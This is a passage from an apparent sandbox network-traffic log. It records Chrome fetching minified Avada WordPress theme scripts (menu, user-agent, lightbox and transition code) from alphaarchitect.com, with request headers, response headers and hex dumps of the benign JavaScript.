                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC878INData Raw: 35 37 31 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 20 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 2c 20 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 20 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2c 6e 3d 65 2e 70 61 72 65 6e 74 28 29 3b 65 2e 66 69 6e 64 28 22 2e 63 68 69 6c 64 72 65 6e 2c 20 2e 73 75 62 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 26 26 65 2e 66 69 6e 64 28 22 2e 63 68 69 6c 64 72 65 6e 2c 20 2e 73 75
                                                                                                                                                                                                                                                                        Data Ascii: 571jQuery(document).ready(function(){jQuery(".fusion-vertical-menu-widget .current_page_item, .fusion-vertical-menu-widget .current-menu-item").each(function(){var e=jQuery(this),n=e.parent();e.find(".children, .sub-menu").length&&e.find(".children, .su
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC522INData Raw: 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 2e 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 7d 29 2c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2d 6d 65 6e 75 2d 77 69 64 67 65 74 2e 68 6f 76 65 72 20 6c 69 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 68 6f 76 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 66 69 6e 64 28 22 3e 20 2e 63 68 69 6c 64 72 65 6e 2c 20 3e 20 2e 73 75 62 2d 6d 65 6e 75 22 29 3b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 29 2c 65 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                        Data Ascii: item-has-children.current-menu-item").length)return!1}),jQuery(".fusion-vertical-menu-widget.hover li").each(function(){var e;jQuery(this).hover(function(){var n=jQuery(this).find("> .children, > .sub-menu");clearTimeout(e),e=setTimeout(function(){n.lengt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        108192.168.2.449865141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC614OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/cssua.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-d0f"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147816
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba168e580c8e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC878INData Raw: 64 30 66 0d 0a 76 61 72 20 63 73 73 75 61 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6f 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 73 3d 22 20 75 61 2d 22 2c 72 3d 2f 5c 73 2a 28 5b 5c 2d 5c 77 20 5d 2b 29 5b 5c 73 5c 2f 5c 3a 5d 28 5b 5c 64 5f 5d 2b 5c 62 28 3f 3a 5b 5c 2d 5c 2e 5f 5c 2f 5d 5c 77 2b 29 2a 29 2f 2c 6e 3d 2f 28 5b 5c 77 5c 2d 5c 2e 5d 2b 5b 5c 73 5c 2f 5d 5b 76 5d 3f 5b 5c 64 5f 5d 2b 5c 62 28 3f 3a 5b 5c 2d 5c 2e 5f 5c 2f 5d 5c 77 2b 29 2a 29 2f 67 2c 61 3d 2f 5c 62 28 3f 3a 28 62 6c 61 63 6b 62 65 72 72 79 5c 77 2a 7c 62 62 31 30 29 7c 28 72 69 6d 20 74 61 62 6c 65 74 20 6f 73 29 29 28 3f 3a 5c 2f 28 5c 64 2b 5c 2e 5c 64 2b 28 3f 3a 5c 2e 5c 77 2b 29 2a 29 29 3f 2f 2c 62 3d 2f 5c 62 73 69 6c 6b 2d 61 63 63 65 6c 65 72 61 74
                                                                                                                                                                                                                                                                        Data Ascii: d0fvar cssua=function(e,o,i){"use strict";var s=" ua-",r=/\s*([\-\w ]+)[\s\/\:]([\d_]+\b(?:[\-\._\/]\w+)*)/,n=/([\w\-\.]+[\s\/][v]?[\d_]+\b(?:[\-\._\/]\w+)*)/g,a=/\b(?:(blackberry\w*|bb10)|(rim tablet os))(?:\/(\d+\.\d+(?:\.\w+)*))?/,b=/\bsilk-accelerat
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 78 70 2e 24 31 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 5f 22 29 2c 76 3d 52 65 67 45 78 70 2e 24 32 3b 28 21 69 5b 66 5d 7c 7c 70 61 72 73 65 46 6c 6f 61 74 28 69 5b 66 5d 29 3c 70 61 72 73 65 46 6c 6f 61 74 28 76 29 29 26 26 28 69 5b 66 5d 3d 76 29 7d 7d 65 6c 73 65 7b 76 61 72 20 78 3d 6d 5b 77 5d 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 78 29 66 6f 72 28 73 3d 30 2c 64 3d 78 2e 6c 65 6e 67 74 68 3b 73 3c 64 3b 73 2b 2b 29 7b 76 61 72 20 67 3d 78 5b 73 5d 2e 73 70 6c 69 74 28 2f 5b 5c 2f 5c 73 5d 2b 2f 29 3b 67 2e 6c 65 6e 67 74 68 26 26 22 6d 6f 7a 69 6c 6c 61 22 21 3d 3d 67 5b 30 5d 26 26 28 69 5b 67 5b 30 5d 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 5f 22 29 5d 3d 67 2e 73 6c 69 63 65 28 31 29 2e 6a 6f 69 6e 28 22 2d 22 29 29
                                                                                                                                                                                                                                                                        Data Ascii: xp.$1.split(" ").join("_"),v=RegExp.$2;(!i[f]||parseFloat(i[f])<parseFloat(v))&&(i[f]=v)}}else{var x=m[w].match(n);if(x)for(s=0,d=x.length;s<d;s++){var g=x[s].split(/[\/\s]+/);g.length&&"mozilla"!==g[0]&&(i[g[0].split(" ").join("_")]=g.slice(1).join("-"))
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1103INData Raw: 73 61 66 61 72 69 2c 31 30 29 5d 7c 7c 69 2e 73 61 66 61 72 69 29 29 3a 69 2e 6d 73 69 65 7c 7c 69 2e 74 72 69 64 65 6e 74 3f 28 69 2e 6f 70 65 72 61 7c 7c 28 69 2e 69 65 3d 69 2e 6d 73 69 65 7c 7c 69 2e 72 76 29 2c 64 65 6c 65 74 65 20 69 2e 6d 73 69 65 2c 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 3f 28 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 3d 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 2c 64 65 6c 65 74 65 20 69 2e 77 69 6e 64 6f 77 73 5f 70 68 6f 6e 65 5f 6f 73 29 3a 22 77 70 64 65 73 6b 74 6f 70 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 26 26 22 78 62 6c 77 70 37 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 26 26 22 7a 75 6e 65 77 70 37 22 21 3d 3d 69 2e 6d 6f 62 69 6c 65 7c 7c 28 69 2e 6d 6f 62 69 6c 65 3d 22 77 69 6e 64 6f 77 73 20 64
                                                                                                                                                                                                                                                                        Data Ascii: safari,10)]||i.safari)):i.msie||i.trident?(i.opera||(i.ie=i.msie||i.rv),delete i.msie,i.windows_phone_os?(i.windows_phone=i.windows_phone_os,delete i.windows_phone_os):"wpdesktop"!==i.mobile&&"xblwp7"!==i.mobile&&"zunewp7"!==i.mobile||(i.mobile="windows d
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        109192.168.2.449867141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC615OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1280"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147816
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba169d1d41cd-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC877INData Raw: 31 32 38 30 0d 0a 76 61 72 20 66 75 73 69 6f 6e 3d 7b 66 75 73 69 6f 6e 52 65 73 69 7a 65 57 69 64 74 68 3a 30 2c 66 75 73 69 6f 6e 52 65 73 69 7a 65 48 65 69 67 68 74 3a 30 2c 63 75 72 72 65 6e 74 50 6f 73 74 49 44 3a 6e 75 6c 6c 2c 74 6f 42 6f 6f 6c 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 74 7c 7c 22 31 22 3d 3d 3d 74 7c 7c 21 30 3d 3d 3d 74 7c 7c 22 74 72 75 65 22 3d 3d 3d 74 7c 7c 22 6f 6e 22 3d 3d 3d 74 7d 2c 72 65 73 74 41 72 67 75 6d 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 6e 75 6c 6c 3d 3d 65 3f 74 2e 6c 65 6e 67 74 68 2d 31 3a 2b 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 2c 69 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                        Data Ascii: 1280var fusion={fusionResizeWidth:0,fusionResizeHeight:0,currentPostID:null,toBool:function(t){return 1===t||"1"===t||!0===t||"true"===t||"on"===t},restArguments:function(t,e){return e=null==e?t.length-1:+e,function(){for(var n,i=Math.max(arguments.leng
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 2b 22 70 78 29 22 29 7d 2c 69 73 4d 65 64 69 75 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 22 2b 28 70 61 72 73 65 49 6e 74 28 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 73 6d 61 6c 6c 29 2b 31 29 2b 22 70 78 29 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 22 2b 70 61 72 73 65 49 6e 74 28 66 75 73 69 6f 6e 4a 53 56 61 72 73 2e 76 69 73 69 62 69 6c 69 74 79 5f 6d 65 64 69 75 6d 29 2b 22 70 78 29 22 29 7d 2c 69 73 4c 61 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4d 6f 64 65 72 6e 69 7a 72 2e 6d 71 28 22
                                                                                                                                                                                                                                                                        Data Ascii: Vars.visibility_small+"px)")},isMedium:function(){return Modernizr.mq("only screen and (min-width:"+(parseInt(fusionJSVars.visibility_small)+1)+"px) and (max-width:"+parseInt(fusionJSVars.visibility_medium)+"px)")},isLarge:function(){return Modernizr.mq("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1369INData Raw: 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 3f 65 3d 74 3a 76 6f 69 64 20 30 21 3d 3d 74 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 6f 66 66 73 65 74 22 29 26 26 28 65 3d 74 2e 64 61 74 61 28 22 61 6e 69 6d 61 74 69 6f 6e 6f 66 66 73 65 74 22 29 29 2c 22 74 6f 70 2d 6d 69 64 2d 6f 66 2d 76 69 65 77 22 3d 3d 3d 65 3f 69 3d 22 30 70 78 20 30 70 78 20 2d 35 30 25 20 30 70 78 22 3a 22 62 6f 74 74 6f 6d 2d 69 6e 2d 76 69 65 77 22 3d 3d 3d 65 26 26 28 6e 3d 5b 30 2c 2e 32 2c 2e 34 2c 2e 36 2c 2e 37 2c 2e 38 2c 2e 39 2c 31 5d 29 2c 7b 72 6f 6f 74 3a 6e 75 6c 6c 2c 72 6f 6f 74 4d 61 72 67 69 6e 3a 69 2c 74 68 72 65 73 68 6f 6c 64 3a 6e 7d 7d 2c 73 68 6f 75 6c 64 4f 62 73 65 72 76 65 72 45 6e 74 72 79 41 6e 69 6d 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: string"==typeof t?e=t:void 0!==t.data("animationoffset")&&(e=t.data("animationoffset")),"top-mid-of-view"===e?i="0px 0px -50% 0px":"bottom-in-view"===e&&(n=[0,.2,.4,.6,.7,.8,.9,1]),{root:null,rootMargin:i,threshold:n}},shouldObserverEntryAnimate:function(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC1129INData Raw: 6e 63 74 69 6f 6e 28 6e 29 7b 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 5b 6e 5d 29 26 26 65 2e 70 75 73 68 28 74 5b 6e 5d 29 7d 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 74 29 2c 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 65 29 29 2c 65 29 3a 5b 5d 7d 2c 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 7c 7c 28 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 61 74 63 68 65 73 3d 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 45 6c 65 6d 65 6e 74 2e
                                                                                                                                                                                                                                                                        Data Ascii: nction(n){Element.prototype.isPrototypeOf(t[n])&&e.push(t[n])}):"string"==typeof t&&(e=document.querySelectorAll(t),e=Array.prototype.slice.call(e)),e):[]},Element.prototype.matches||(Element.prototype.matches=Element.prototype.msMatchesSelector||Element.
                                                                                                                                                                                                                                                                        2024-12-20 12:44:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        110192.168.2.449869141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC629OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-2e4"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1d685043b6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC747INData Raw: 32 65 34 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 69 3d 21 31 2c 72 3d 74 68 69 73 3b 6e 28 74 68 69 73 29 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 21 30 7d 29 3b 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 7c 7c 6e 28 72 29 2e 74 72 69 67 67 65 72 28 6e 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 2e 65 6e 64 29 7d 2c 74 29 2c 74 68 69 73 7d 2c 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                        Data Ascii: 2e4!function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var i=!1,r=this;n(this).one("bsTransitionEnd",function(){i=!0});return setTimeout(function(){i||n(r).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=functio
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        111192.168.2.449868141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC838OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-lightbox.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:00 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1c45"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147817
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba1d6cfe425f-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:00 UTC877INData Raw: 31 63 34 35 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 76 61 64 61 4c 69 67 68 74 42 6f 78 49 6e 69 74 69 61 6c 69 7a 65 4c 69 67 68 74 62 6f 78 28 29 7b 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 26 26 6a 51 75 65 72 79 2e 65 61 63 68 28 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 5b 74 5d 2e 64 65 73 74 72 6f 79 28 29 7d 29 2c 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 2e 69 6e 69 74 69 61 6c 69 7a 65 5f 6c 69 67 68 74 62 6f 78 28 29 7d 77 69 6e 64 6f 77 2e 61 76 61 64 61 4c 69 67 68 74 42 6f 78 3d 7b 7d 2c 76 6f 69 64 20 30 3d 3d 3d 77 69 6e 64 6f 77 2e 24 69 6c 49 6e 73 74 61 6e 63 65 73 26 26 28 77 69 6e 64 6f 77
                                                                                                                                                                                                                                                                        Data Ascii: 1c45function avadaLightBoxInitializeLightbox(){window.$ilInstances&&jQuery.each(window.$ilInstances,function(t,i){window.$ilInstances[t].destroy()}),window.avadaLightBox.initialize_lightbox()}window.avadaLightBox={},void 0===window.$ilInstances&&(window
